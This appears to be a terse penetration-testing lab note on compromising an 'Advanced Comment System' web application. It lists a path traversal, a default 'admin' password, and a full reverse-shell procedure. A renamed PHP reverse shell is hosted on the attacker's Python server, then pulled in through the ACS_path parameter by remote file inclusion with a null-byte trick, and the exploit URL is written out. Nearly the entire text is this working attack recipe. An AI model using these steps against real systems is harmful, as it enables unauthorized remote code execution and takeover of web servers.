advanced_component_system
Last updated
Last updated
#Path traversal Default login page Default pass: admin Reverse shell [1]use classic php-reverse-shell.php → shelly.php.config.php Modify host and listening port [2]Serve using python on port 80 (IMPORTANT!) [3]Trigger revshell https://10.11.1.8/internal/advanced_comment_system/index.php?ACS_path=http://192.168.119.177/shelly.php.config.php?%00 Important: - shell.php → adding the extension .config.php → shelly.php.config.php - ?%00 → question mark and null byte at the end of the string